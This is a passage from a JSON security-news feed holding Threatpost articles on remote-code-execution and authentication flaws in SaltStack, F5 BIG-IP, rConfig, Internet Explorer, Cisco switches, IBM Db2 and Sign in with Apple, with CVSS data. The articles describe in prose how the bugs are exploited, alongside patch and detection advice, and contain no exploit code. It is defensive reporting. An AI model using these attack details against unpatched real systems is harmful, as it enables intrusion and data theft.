"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-14T22:25:49", "description": "The open-source Salt management framework contains high-severity security vulnerabilities that allow full remote code execution as root on servers in data centers and cloud environments. And in-the-wild attacks are expected imminently.\n\nAccording to F-Secure researchers, the framework, authored by the company SaltStack but also used as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of servers, has a pair of flaws within its default communications protocol, known as ZeroMQ.\n\nA bug tracked as CVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bugs are especially dangerous given the topography of the Salt framework.\n\n\u201cEach server [managed by Salt] runs an agent called a \u2018minion,\u2019 which connects to a \u2018master,'\u201d explained F-Secure, [in a writeup](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) on Thursday. \u201c[A master is a] Salt installation that collects state reports from minions and publishes update messages that minions can act on.\u201d\n\nThese update messages are usually used to change the configuration of a selection of servers, but they can also be used to push out commands to multiple, or even all, of the managed systems, researchers said. An adversary thus can compromise the master in order to send malicious commands to all of the other servers in the cluster, all at the same time.\n\n## **Lapses in Protocol**\n\nTo communicate, the master uses two [ZeroMQ channels](<https://docs.saltstack.com/en/getstarted/system/communication.html>). As F-Secure explained, one is a \u201crequest server\u201d where minions can connect to report their status (or the output of commands). The other is a \u201cpublish server\u201d where the master publishes messages that the minions can connect and subscribe to.\n\nThe authentication bypass can be achieved because the ClearFuncs class processes unauthenticated requests and unintentionally exposes the \u201c_send_pub().\u201d This is the method used to queue messages from the master publish server to the minions \u2013 and thus can be used to send arbitrary commands. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nAlso, \u201cthe ClearFuncs class also exposes the method _prep_auth_info(), which returns the root key used to authenticate commands from the local root user on the master server. This root key can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\u201d\n\nAs for the directory traversal, the \u201cwheel\u201d module contains commands used to read and write files under specific directory paths.\n\n\u201cThe inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction,\u201d according to the writeup. \u201cThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing\u2026the reading of files outside of the intended directory.\u201d\n\nThe bugs together allow attackers \u201cwho can connect to the request server port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the master server filesystem and steal the secret key used to authenticate to the master as root,\u201d according to the firm.\n\nAccording to the National Vulnerability Database, \u201cThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\u201d\n\n## **Exploits in Less Than a Day**\n\nF-Secure said that it expects to see attacks in the wild very shortly.\n\n\u201cWe expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours,\u201d the researchers said, citing the \u201creliability and simplicity\u201d of exploitation.\n\nUnfortunately, the firm also said that a preliminary scan has revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet.\n\nPatches are available in release 3000.2. Also, \u201cadding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\u201d F-Secure concluded.\n\nTo detect a compromise, ASCII strings \u201c_prep_auth_info\u201d or \u201c_send_pub\u201d will show up in the request server port data (default 4506).\n\nAlso on the detection front, \u201cpublished messages to minions are called \u2018jobs\u2019 and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job IDs (\u2018jids\u2019) that look out of the ordinary,\u201d F-Secure noted.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-04-30T20:54:50", "type": "threatpost", "title": "Salt Bugs Allow Full RCE as Root on Cloud Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-5135"], "modified": "2020-04-30T20:54:50", "id": "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "href": "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:22:26", "description": "About 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.\n\nThe BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.\n\nAt the end of June, F5 issued urgent patches for a critical RCE flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which is present in the Traffic Management User Interface (TMUI) of the company\u2019s BIG-IP app delivery controllers. The bug has a CVSS severity score of 10 out of 10, and at the time of disclosure, Shodan [showed](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) that there were almost 8,500 vulnerable devices exposed on the internet.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nShortly after disclosure, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers, and ultimately active exploits.\n\n\u201cCVE-2020-5902 received the highest vulnerability rating of critical from the National Vulnerability Database due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d Expanse researchers noted in [an advisory](<http://expanse.co/blog/expanse-researchers-show-more-than-8,000-f5-big-ip-tmuis-are-still-exposed-on-the-internet>) issued on Friday. \u201cIt was deemed so critical that U.S. Cyber Command [issued a tweet](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) on the afternoon of July 3, recommending immediate patching despite the holiday weekend. While F5 did not release a proof of concept (PoC) for the exploit, numerous PoCs began appearing on July 5.\u201d\n\nFast-forward to two weeks later, and patches have rolled out to less than 500 of that original group of vulnerable machines, according to the analysis. Expanse researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet.\n\nThe stakes are high, as one would expect from a critical-rated bug: \u201cThe vulnerability CVE-2020-5902 allows for the execution of arbitrary system commands on vulnerable BIG-IP devices with an exposed and accessible management port via the TMUI,\u201d explained the researchers. \u201cThis vulnerability could provide complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serve as a hop point into other areas of the network.\u201d\n\nTo boot, an additional bug, [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>), affects the same vulnerable management interface via a cross-site scripting vulnerability (XSS) that Expanse said could also be leveraged to include RCE.\n\nDespite active exploits and security experts urging companies to deploy the urgent patch for the critical vulnerability, patching is clearly going slowly \u2013 something that Tim Junio, CEO and co-founder of Expanse, chalks up to a lack of visibility.\n\n\u201cPatching is likely proceeding slowly because organizations may not know that they have these TMUIs,\u201d Junio told Threatpost. \u201cIf they are unaware of their complete inventory of internet-connected systems and services, they will not have well-defined processes for patching them. Security teams are also often stretched thin and that can result in delays in patching, even for critical items like this.\u201d\n\nJunio also told Threatpost that if a malicious actor gained this type of remote access it could be catastrophic \u2013 and yet the bug carries an ease of exploitation that he likens to a Jedi mind trick.\n\n\u201cAn attacker just needs to send the firewall a set of commands, which are now publicly known, in order to take over the firewall,\u201d he explained. \u201cA physical world analogy: If a firewall is a bit like a guard and a gate at the entrance of a facility that is surrounded by walls, this exploit is like a Jedi mind trick whereby an attacker can walk right up to the guard, suggest to the guard they leave their post and give the attacker a guard uniform and all keys to the gate \u2013 and _the guard will say yes_.\u201d\n\nThe attacker can then carry out all sorts of different nefarious activities in the context of a privileged user.\n\nJunio explained, continuing his analogy, \u201cIn other words, the attacker can now walk into the facility unimpeded (unauthorized access); bring sensitive data and objects out of the facility unimpeded (exfiltration); and can close the gate to legitimate people trying to enter the facility (denial of service); among many other actions.\u201d\n\nThe TMUI is responsible for configuration, and Junio noted that there\u2019s generally no reason for it to be exposed to the internet \u2013 so, a simple interim mitigation (albeit not a full one) in lieu of patching would be to remove it from public view.\n\n\u201cThis is a very concerning number of exposed TMUIs on the internet,\u201d said Junio. \u201cA hack of a major enterprise via this type of attack vector could be very damaging to that organization.\u201d\n\nHe added that he believes that an attack on any number of enterprises could go so far as to be harmful to the global economy.\n\n\u201cActual day-to-day users of F5 equipment are generally going to be security operations, network operations or infrastructure professionals,\u201d said Junio. \u201cBigger picture, the customers/buyers of this technology are some of the world\u2019s largest enterprises and government agencies.\u201d These include 48 out of the Fortune 50, he added, though he\u2019s not aware which, if any, of these specific installations are vulnerable to attack.\n", "cvss3": {}, "published": "2020-07-17T20:59:33", "type": "threatpost", "title": "Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-17T20:59:33", "id": "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "href": "https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:29:39", "description": "Two bugs in the network configuration utility rConfig have been identified, both allowing remote code execution on affected systems. Worse, one is rated critical and allows for a user to attack a system remotely \u2013 sans authentication.\n\nRConfig is a free open-source configuration management utility used by over 7,000 network engineers to take snapshots of over 7 million network devices, according [the project\u2019s website](<https://www.rconfig.com/>).\n\nThe vulnerabilities ([CVE-2019-16663](<https://nvd.nist.gov/vuln/detail/CVE-2019-16663>), [CVE-2019-16662](<https://nvd.nist.gov/vuln/detail/CVE-2019-16662>)) are both tied to rConfig version 3.9.2. The more serious of the two vulnerabilities (CVE-2019-16662) allows an attacker to execute system commands on affected devices via GET requests, which can lead to command instructions.\n\n\u201cI was able to detect two remote command execution vulnerabilities in two different files, the first one called \u2018ajaxServerSettingsChk.php\u2019 file which suffers from an unauthenticated RCE that could triggered by sending a crafted GET request via \u2018rootUname\u2019 parameter which is declared in line,\u201d wrote Mohammad Askar, the researcher who discovered the vulnerabilities.\n\nThis flaw has the higher CVSS (v3.1) rating of 9.8 out of 10. The second bug (CVE-2019-16663) has a high CVSS (v3.1) rating of 8.8.\n\n\u201cThe second vulnerability has been discovered in a file called \u2018search.crud.php\u2019 which suffers from an authenticated RCE that could triggered by sending a crafted GET request that contains two parameters,\u201d he wrote.\n\nAskar said he reported both vulnerabilities on Sept. 19, 2019. He wrote, he did not receive a \u201cfix release date or even a statement that they will fix the vulnerability,\u201d so after 35 days \u201cwith no response\u201d he released a proof-of-concept exploit on Oct. 25.\n\nOn Nov. 4, researcher Johannes Ullrich, dean of research with the SANS Technology Institute, [reported honeypot activity tied to both vulnerabilities](<https://isc.sans.edu/forums/diary/rConfig+Install+Directory+Remote+Code+Execution+Vulnerability+Exploited/25484/>).\n\n\u201cI was somewhat surprised that I saw pretty active exploitation of the vulnerability. The exploits came from over 300 different sources at that point, and still kept coming in at a pretty steady pace,\u201d Ullrich wrote.\n\nThe researcher said the honeypot analysis suggested that traffic was not generated by security firms or researchers, rather \u201ca botnet is used to scan for the vulnerability, and the origin hosts have been infected themselves.\u201d Scanning hosts appear to be primarily based in China.\n\n\u201cIt looks like we got all the pieces in place for a major security issue,\u201d Ullrich said.\n\nAdditional research into the rConfig vulnerabilities, published on Sunday, suggest the security issues aren\u2019t limited to rConfig version 3.9.2.\n\n\u201cAfter reviewing [rConfig\u2019s source code](<https://github.com/rconfig/rconfig>), however, I found out that not only rConfig 3.9.2 has those vulnerabilities but also all versions of it,\u201d [wrote a researcher](<https://www.sudokaikan.com/2019/11/cve-2019-16662-cve-2019-16663.html>) by the name of [Sudoka](<https://twitter.com/sudo_sudoka>). \u201cFurthermore, CVE-2019-16663, the post-auth RCE can be exploited without authentication for all versions before rConfig 3.6.0.\u201d\n\nThere are steps for mitigation, however a message left on the rConfig project page is discouraging, Ullrich said. The project\u2019s main website doesn\u2019t appear to be updating and the [GitHub repository has a message:](<https://github.com/rconfig/rconfig>) \u201cI am no longer fixing bugs on rConfig version 3.x. I will manage PRs.\u201d\n\n\u201cMy advice: It doesn\u2019t look like rConfig is currently maintained (at leas the version offered for download right now). I would stay away from it,\u201d Ullrich said.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join an expert from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-11-04T16:38:36", "type": "threatpost", "title": "Critical Remote Code Execution Flaw Found in Open Source rConfig Utility", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16662", "CVE-2019-16663", "CVE-2020-5135"], "modified": "2019-11-04T16:38:36", "id": "THREATPOST:B313D27399CB1B0B0727DC338B57B95E", "href": "https://threatpost.com/critical-rce-flaw-in-rconfig/149847/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:29:35", "description": "A critical bug in a Microsoft scripting engine, under active attack, has been patched as part of Microsoft\u2019s Patch Tuesday security roundup.\n\nThe vulnerability exists in Internet Explorer and allows an attacker to execute rogue code if a victim is coaxed into visiting a malicious web page, or, if they are tricked into opening a specially crafted Office document.\n\n\u201cAn attacker who successfully exploits the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker\u2026could take control of an affected system,\u201d Microsoft [wrote in its advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>).\n\nUnder an Office document attack scenario, Microsoft said an adversary might embed an ActiveX control marked \u201csafe for initialization\u201d in an Office document. If initialized, the malicious document could then directed to a rogue website, booby-trapped with specially crafted content that could exploit the vulnerability. \n[](<https://threatpost.com/newsletter-sign/>)The bug ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)), first identified by Google Project Zero, is believed to be actively exploited in the wild, according to the computing giant.\n\n**November Patch Tuesday Tackles Additional Critical and Important Bugs**\n\nIn total, Microsoft issued 75 CVEs that included 11 critical and 64 important.\n\nOne of the critical bugs includes an Excel security feature bypass flaw ([CVE-2019-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1457>)) which [was publicly disclosed at the end of October](<https://threatpost.com/office-for-mac-malicious-sylk-files/149823/>) and exploited as a zero-day.\n\n\u201c[This] is a security feature bypass in Microsoft Office for Mac due to improper enforcement of macro settings in Excel documents,\u201d explained Satnam Narang, senior research engineer at Tenable, in an email analysis of Patch Tuesday. \u201cAn attacker would need to create a specially crafted Excel document using the SYLK (SYmbolic LinK) file format, and convince a user to open such a file using a vulnerable version of Microsoft Office for Mac.\u201d\n\nEarlier this month, Microsoft warned that malicious SYLK files [are sneaking past endpoint defenses](<https://threatpost.com/office-for-mac-malicious-sylk-files/149823/>) even when the \u201cdisable all macros without notification\u201d function is turned on. This leaves systems vulnerable to a remote, unauthenticated attackers who can execute arbitrary code.\n\n\u201cXLM macros can be incorporated into SYLK files,\u201d wrote the [United States Computer Emergency Readiness Team](<https://kb.cert.org/vuls/id/125336/>) in a warning earlier this month. \u201cMacros in the SYLK format are problematic in that Microsoft Office does not open in Protected View to help protect users.\u201d\n\n**Microsoft Trusted Platform Module Guidance and Housecleaning**\n\nThe Patch Tuesday advisories also included non-CVE updates such as [one regarding a vulnerability in Trusted Platform Module](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190024>) (TPM) chipset. The TPM vulnerability is a third-party bug not connected to the Windows operating system.\n\n\u201cCurrently no Windows systems use the vulnerable algorithm. Other software or services you are running might use this algorithm. Therefore if your system is affected [it] requires the installation of TPM firmware updates,\u201d wrote Microsoft in its advisory, [ADV190024](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190024>).\n\nThe vulnerability weakens key confidentiality protection for the Elliptic Curve Digital Signature Algorithm or ECDSA. The technology is used for a variety of [different applications such as a Bitcoin-related](<https://en.bitcoin.it/wiki/Elliptic_Curve_Digital_Signature_Algorithm>) app where it is leveraged to ensure that funds can only be [spent by their rightful owners](<https://en.bitcoin.it/wiki/Elliptic_Curve_Digital_Signature_Algorithm>).\n\nChris Goettl, researcher with Ivanti, said this November Patch Tuesday should also serve as a reminder to a number of key Windows end-of-life dates.\n\n\u201cThere are some Windows end-of-life dates that users should be aware of both this month and coming in January,\u201d Goettl wrote. He added there are \u201csome additional details on extended support for Windows 7 and Server 2008\\2008 R2 from a [blog post in November](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) that discuss how to get access and ensure your systems are prepared for extended support if you are continuing on.\u201d\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T21:35:20", "type": "threatpost", "title": "Microsoft Patches RCE Bug Actively Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1429", "CVE-2019-1457", "CVE-2020-5135"], "modified": "2019-11-12T21:35:20", "id": "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "href": "https://threatpost.com/microsoft-patches-rce-bug/150136/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:19", "description": "Cisco Systems released security patches on Wednesday for high-severity vulnerabilities affecting over a half dozen of its small business switches. The flaws allow remote unauthenticated adversaries to access sensitive information and level denial-of-service (DoS) attacks against affected gear.\n\nImpacted are Series Smart Switches, Series Managed Switches and Series Stackable Managed Switches. Cisco said it was unaware of active exploitation of the vulnerabilities and software updates remediating the flaws are available, however no workaround fixes are available.\n\nThe vulnerabilities include an information disclosure flaw ([CVE-2019-15993](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smlbus-switch-dos-R6VquS2u>)) and a bug ([CVE-2020-3147](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smlbus-switch-dos-R6VquS2u>)) that creates conditions optimum for a DoS attack. \n[](<https://threatpost.com/newsletter-sign/>)\n\nCisco says that the latter vulnerability is tied the web user interface used by affected switches that could allow an unauthenticated remote attacker to \u201ccause an unexpected reload of the device, resulting in a DoS condition.\u201d\n\nThe vulnerability is due to improper validation of requests sent to the web interface. \u201cAn attacker could exploit this vulnerability by sending a malicious request to the web interface of an affected device,\u201d Cisco wrote.\n\nA weakness in Cisco\u2019s web user interface for its small business switches is also to blame for the information disclosure bug.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/30123004/Cisco-Small-Business-Switches.jpg>)\u201cThe vulnerability exists because the software lacks proper authentication controls to information accessible from the web UI. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web UI of an affected device,\u201d Cisco wrote.\n\nA successful attack could allow an adversary to access sensitive configuration files, according to the company.\n\nVulnerable to the information disclosure bug are: 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches and 550X Series Stackable Managed Switches running firmware release earlier than 2.5.0.92. Also impacted are switch models 200 Series Smart Switches, 300 Series Managed Switches and 500 Series Stackable Managed Switches running a firmware release earlier than 1.4.11.4.\n\nCisco said the DoS bug impacts the same products with the exception of switches; 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches and 550X Series Stackable Managed Switches.\n\nResearcher Ken Pyle of DFDR Consulting is credited by Cisco for reporting both vulnerabilities.\n", "cvss3": {}, "published": "2020-01-30T17:38:37", "type": "threatpost", "title": "Cisco Patches Two High-Severity Bugs in its Small Business Switch Lineup", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15993", "CVE-2020-3147", "CVE-2020-5135"], "modified": "2020-01-30T17:38:37", "id": "THREATPOST:97C27999457834C42771A5FB9EEAD852", "href": "https://threatpost.com/cisco-patches-high-severity-bugs-in-switch-lineup/152392/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-10-14T22:21:09", "description": "The IBM\u2019s next-gen data-management software suffers from a shared-memory vulnerability that researchers said could lead to other threats \u2014 as demonstrated by a new proof-of-concept exploit for the bug.\n\nThe IBM Db2 is a family of hybrid data-management products containing artificial intelligence, which can be used to analyze and manage both structured and unstructured data within enterprises.\n\nAccording to researchers at Trustwave, the recently disclosed bug (CVE-2020-4414) arises because the platform\u2019s developers forgot to put explicit memory protections around the shared memory used by the Db2 trace facility. If exploited, it could lead to denial-of-service (DoS) or information disclosure.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe trace facility is a function that allows users to isolate certain data points by monitoring selected parameters. This gives users what is essentially a log of control flow information (functions and associated parameter values), which can be helpful in slicing, dicing and separating out data for analysis. As such, the data at risk from an exploit could be literally anything generated within a targeted organization. For a healthcare provider for instance, cybercriminals could make off with HIPAA-protected patient information; a financial company meanwhile could be at risk for a breach of credit-card data.\n\nOn the DoS front, Karl Sigler, senior security research manager for SpiderLabs at Trustwave, told Threatpost that \u201cdatabases are often deployed as critical system. An attacker with a foothold on the system could consistently bring down the database and interrupt whatever system that depends on it and it\u2019s data.\u201d\n\nThe crux of the issue is that it allows local privilege-escalation and crashing of the device. The lack of explicit memory protections \u201callows any local users read-and-write access to that memory area,\u201d Trustwave researchers said, in their PoC exploit writeup for the bug, issued on Thursday. \u201cIn turn, this allows them to access critically sensitive data as well as the ability to change how the trace subsystem functions, resulting in a denial-of-service condition in the database.\u201d\n\nThey added, \u201cNeedless to say, both shouldn\u2019t be possible for regular users.\u201d\n\nWhile technically an attacker would need to be local, it\u2019s possible to remotely execute such a low-privileged process (i.e., malware) on a vulnerable machine to trigger an exploit: \u201cLow-privileged processes, running on the same computer as Db2 database, can alter Db2 traces and capture sensitive data \u2013 and use that later for subsequent attacks,\u201d the researchers explained.\n\n## PoC Launched\n\nTo exploit the bug, attackers can send a specially crafted request to the trace facility.\n\nTrustwave\u2019s PoC starts with launching Process Explorer or other any similar tool in Windows to check open handles of the Db2 main process. Then, the researchers created a simple console application that tries to open a given memory section by name. Once that\u2019s running, an attacker can enable Db2 tracing, which opens the door to an attack.\n\n\u201cAnd now we can see what\u2019s been written to those memory sections,\u201d according to Trustwave\u2019s analysis. \u201cIn the end, this means that an unprivileged local user can abuse this to cause a denial-of-service condition simply by writing incorrect data over that memory section\u2026there are absolutely no permissions assigned to the shared memory so that anyone can read from and write to it.\u201d\n\nMartin Rakhmanov, security research manager for SpiderLabs at Trustwave, elaborated on the PoC for Threatpost. \u201cI show Process Explorer just to illustrate that shared memory is not protected. It is not required to conduct the attack at all,\u201d he said. \u201cThe console application just reads the shared memory and thus can access Db2 trace information. It can be modified (the app) to change the Db2 trace as well. Finally, the attacker needs a low-privileged access to the computer where Db2 server is running.\u201d\n\nHe added, \u201cThis is not the same as having control of the machine. So anyone who can connect to the computer where Db2 server is running can read/change the Db2 trace which is not good: On the contrary, the tracing facility requires special privileges inside the Db2 but the vulnerability allows to bypass that.\u201d\n\nThis shared-memory vulnerability is very similar to one [found in the Cisco WebEx Meetings Client](<https://threatpost.com/cisco-webex-router-code-execution/156706/>) on Windows in March (CVE-2020-3347), where any user could read memory dedicated to trace data, Trustwave researchers explained. In that case, any malicious local user or malicious process running on a PC where WebEx is installed can monitor the memory mapped file for a login token. Once found, the token, like any leaked credentials, can be transmitted somewhere so that it can be used to login to the WebEx account in question, download recordings, view/edit meetings and so on.\n\nAll fix pack levels of IBM Db2 V9.7, V10.1, V10.5, V11.1, and V11.5 editions on all platforms are affected by this latest shared-memory flaw, and users should [update to the latest version](<https://www.ibm.com/support/pages/node/6242356>) to fix the issue, the firm said.\n\n\u201cThis attack could have been widespread, as all Db2 instances of up-to-current version (11.5) on Windows were affected,\u201d Trustwave researchers noted.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-20T12:00:39", "type": "threatpost", "title": "IBM AI-Powered Data Management Software Subject to Simple Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3347", "CVE-2020-4414", "CVE-2020-5135"], "modified": "2020-08-20T12:00:39", "id": "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "href": "https://threatpost.com/ibm-ai-powered-data-management-software-subject-exploit/158497/", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-10-15T22:19:05", "description": "A researcher recently found a critical Apple vulnerability that, if exploited, could enable remote attackers to abuse the \u201cSign in with Apple\u201d feature to take over victims\u2019 third-party application accounts. The security researcher, Bhavuk Jain, reported the flaw to Apple via its bug bounty program, and was awarded $100,000 for the find.\n\nThe flaw stemmed from the \u201c[Sign in with Apple](<https://developer.apple.com/sign-in-with-apple/>)\u201d feature, which was introduced by Apple at its Worldwide Developers Conference last year. Sign in with Apple aimed to make it easy and secure for Apple users to sign into third-party apps and websites. It did this by implementing an Apple-backed authentication system to replace social logins on third-party services.\n\n\u201cIn the month of April, I found a zero-day in Sign in with Apple that affected third-party applications which were using it and didn\u2019t implement their own additional security measures,\u201d said Jain, [in his disclosure of the bug on Sunday](<https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/>). \u201cThis bug could have resulted in a full account takeover of user accounts on that third party application irrespective of a victim having a valid Apple ID or not.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nApple has since fixed the flaw. Threatpost has reached out to Apple for further comment.\n\nOne of the highlights of Sign in with Apple is that users could sign up with third-party services without needing to disclose their Apple ID email address to these services. This worked because Sign in with Apple would first validate users on the client side, and then initiate a JSON Web Token (JWT) request from Apple\u2019s authentication services. This JWT would then be used by the third-party app to confirm the user\u2019s identity.\n\nThe issue was that after Apple validated the user on the client side via their Apple ID email address, it did not verify that the JWT request was from that actual user account. An attacker could abuse this flaw by providing an Apple ID email that belongs to the victim and tricking Apple servers into generating a valid JWT payload. Once an attacker does this, he can then sign into a third-party app using the victim\u2019s identity.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/01105057/flow_apple_auth.png>)\n\nCredit: Bhavuk Jain\n\n\u201cI found I could request JWTs for any Email ID from Apple and when the signature of these tokens was verified using Apple\u2019s public key, they showed as valid,\u201d he said. \u201cThis means an attacker could forge a JWT by linking any Email ID to it and gaining access to the victim\u2019s account.\u201d\n\nAccording to [The Hacker News](<https://thehackernews.com/2020/05/sign-in-with-apple-hacking.html>), the flaw could be exploited even if users had decided to hide their email IDs from third-party services. It could also be exploited to sign up new accounts with victims\u2019 Apple IDs.\n\nThere are two hoops that attackers would need to jump through to make this exploit work. First, they would need an email ID for an Apple user \u2013 though that could be any Apple user\u2019s email ID. Second, they would need to log into a third-party app via Sign in with Apple that didn\u2019t require any further security measures.\n\nJain said the impact of this vulnerability is \u201cquite critical\u201d as it could allow full account takeover. Many developers have integrated Sign in with Apple into their services, including Dropbox, Spotify, Airbnb, and Giphy.\n\n\u201cThese applications were not tested but could have been vulnerable to a full account takeover if there weren\u2019t any other security measures in place while verifying a user,\u201d Jain said.\n\nJain said that Apple conducted an investigation of their logs and determined there was no misuse or account compromise due to this vulnerability. The researcher found the flaw in April and reported it via Apple\u2019s bug bounty program which earned him $100,000. Threatpost has reached out to Jain for further details on the timeline of discovering and reporting the flaw.\n\n[Apple in December 2019](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) opened up its historically private bug-bounty program to the public, bolstering its top payout to $1 million, in an effort to weed out serious 